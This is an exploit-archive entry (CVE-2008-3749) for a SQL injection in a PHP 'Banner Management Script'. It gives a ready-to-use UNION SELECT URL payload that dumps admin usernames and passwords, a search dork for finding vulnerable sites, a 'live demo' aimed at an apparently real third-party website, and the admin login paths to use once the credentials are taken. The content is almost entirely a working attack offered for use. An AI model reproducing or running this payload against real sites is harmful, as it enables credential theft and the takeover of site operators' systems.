Banner Management Script - 'id' SQL Injection

Author: S.W.A.T.
type: webapps
platform: php
port: 
date_added: 2008-08-18  
date_updated: 2016-12-20  
verified: 1  
codes: OSVDB-47579;CVE-2008-3749  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6276.txt  
|___________________________________________________|
|
| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------S.W.A.T.----------------------|
|
|    Author: S.W.A.T.
|
|    Home :  www.svvat.ir
|
|    email:  svvateam[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
|
| DorK   : inurl:tr.php?id= Banner
|___________________________________________________|

Exploit:
________



www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--






L!VE DEMO:
_________


http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


____________

Admin Login :

www.[target].com/Script/admin.php

or

www.[target].com/Script/adadmin.php

# milw0rm.com [2008-08-19]